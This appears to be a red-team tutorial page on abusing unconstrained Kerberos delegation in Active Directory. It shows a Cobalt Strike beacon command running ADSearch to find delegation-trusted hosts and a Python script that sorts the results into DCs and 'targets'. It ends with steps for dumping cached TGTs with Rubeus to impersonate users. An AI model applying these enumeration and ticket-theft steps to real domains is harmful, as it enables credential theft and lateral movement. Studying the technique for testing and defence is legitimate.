A service or machine account trusted for unconstrained delegation can authenticate to any other service in the domain on behalf of a client, including services it has no business reaching. It works because, when a client obtains a service ticket for such a host, the KDC embeds a forwardable copy of the client's TGT in the ticket; the receiving host extracts that TGT and caches it in LSASS so it can later request tickets for other domain services as that client.

Danger!

Unconstrained delegation is not recommended: use constrained (or resource-based constrained) delegation whenever possible. Once an account permitted for unconstrained delegation is compromised, every TGT cached on it can be dumped and used to impersonate the associated principals for as long as those tickets remain valid.

Exploit

To find machine accounts permitted for unconstrained delegation using ADSearch. The userAccountControl attribute is a bitmask of account flags; the string 1.2.840.113556.1.4.803 is the OID of the LDAP_MATCHING_RULE_BIT_AND extensible match, which returns objects where every bit in the given mask is set; and 524288 (0x80000, 2^19) is the TRUSTED_FOR_DELEGATION bit that marks unconstrained delegation. The objectCategory=computer clause restricts the search to machine accounts; user (service) accounts can carry the same flag and would need the filter widened to find them:

NOTE

Domain controller machine accounts have TRUSTED_FOR_DELEGATION set by default and may always perform unconstrained delegation, so every DC will appear in the results. The interesting findings are the non-DC hosts.

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname
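The following is an added example, not code from the original page or from ADSearch: it reproduces in plain Python what the bitwise-AND filter above does server-side, then triages the result set so that domain controllers (expected hits) are separated from other hosts (the ones worth attacking). The directory entries, host names and userAccountControl values below are constructed for illustration.

```python
"""Triage ADSearch-style results for unconstrained delegation.

Added example: the entries in SAMPLE_ENTRIES are constructed, not a real dump.
"""

# userAccountControl flag bits (MS-ADTS / MS-SAMR) that matter for this hunt.
TRUSTED_FOR_DELEGATION = 0x80000            # 524288 = 2**19: unconstrained delegation
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller machine account
WORKSTATION_TRUST_ACCOUNT = 0x1000          # ordinary computer account
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"

LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

UAC_NAMES = {
    WORKSTATION_TRUST_ACCOUNT: "WORKSTATION_TRUST_ACCOUNT",
    SERVER_TRUST_ACCOUNT: "SERVER_TRUST_ACCOUNT",
    TRUSTED_FOR_DELEGATION: "TRUSTED_FOR_DELEGATION",
    NOT_DELEGATED: "NOT_DELEGATED",
    TRUSTED_TO_AUTH_FOR_DELEGATION: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}


def unconstrained_delegation_filter(include_users=False):
    """Build the LDAP filter used on the page; optionally widen it to user objects."""
    bit_and = f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={TRUSTED_FOR_DELEGATION})"
    if include_users:
        return f"(&(|(objectCategory=computer)(objectCategory=person)){bit_and})"
    return f"(&(objectCategory=computer){bit_and})"


def bit_and_matches(uac, mask):
    """Local equivalent of LDAP_MATCHING_RULE_BIT_AND: true when every bit of mask is set."""
    return (int(uac) & mask) == mask


def decode_uac(uac):
    """Return the names of the known flags set in a userAccountControl value."""
    uac = int(uac)
    return [name for bit, name in sorted(UAC_NAMES.items()) if uac & bit]


def triage(entries):
    """Split accounts trusted for unconstrained delegation into DCs and other hosts.

    Each entry is a dict with samaccountname, dnshostname and userAccountControl,
    the attributes the ADSearch query on the page returns. Accounts whose only
    delegation bit is TRUSTED_TO_AUTH_FOR_DELEGATION are constrained, not
    unconstrained, and are deliberately not matched.
    """
    dcs, targets = [], []
    for entry in entries:
        uac = int(entry["userAccountControl"])
        if not bit_and_matches(uac, TRUSTED_FOR_DELEGATION):
            continue
        bucket = dcs if bit_and_matches(uac, SERVER_TRUST_ACCOUNT) else targets
        bucket.append(entry["dnshostname"])
    return {"domain_controllers": sorted(dcs), "targets": sorted(targets)}


# Constructed sample data resembling a directory dump (hypothetical hosts).
SAMPLE_ENTRIES = [
    # 0x82000: DC account with unconstrained delegation (expected, default for DCs)
    {"samaccountname": "DC01$", "dnshostname": "dc01.corp.example", "userAccountControl": 532480},
    # 0x81000: workstation/server account with unconstrained delegation (the real finding)
    {"samaccountname": "WEB01$", "dnshostname": "web01.corp.example", "userAccountControl": 528384},
    # 0x1000: plain computer account, no delegation
    {"samaccountname": "FS01$", "dnshostname": "fs01.corp.example", "userAccountControl": 4096},
    # 0x1001000: constrained delegation with protocol transition, not matched by the filter
    {"samaccountname": "SQL01$", "dnshostname": "sql01.corp.example", "userAccountControl": 16781312},
]


if __name__ == "__main__":
    print(unconstrained_delegation_filter())
    for entry in SAMPLE_ENTRIES:
        print(entry["samaccountname"], decode_uac(entry["userAccountControl"]))
    print(triage(SAMPLE_ENTRIES))
```

Running it prints the exact filter string used with ADSearch above and shows that only web01 ends up in the target list: the DC matches the filter but is expected, and the account with only the protocol-transition bit does not match at all.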

To attack, run Rubeus from an elevated context on the compromised host: `triage` lists the tickets cached in every logon session, and `dump` (narrowed to the krbtgt service) extracts the cached TGTs, which can then be passed into a session to impersonate the owning principals. Only principals that have actually authenticated to the host since its last reboot have a TGT cached there, and members of Protected Users or accounts marked "Account is sensitive and cannot be delegated" never send one, so the haul depends on who has recently connected.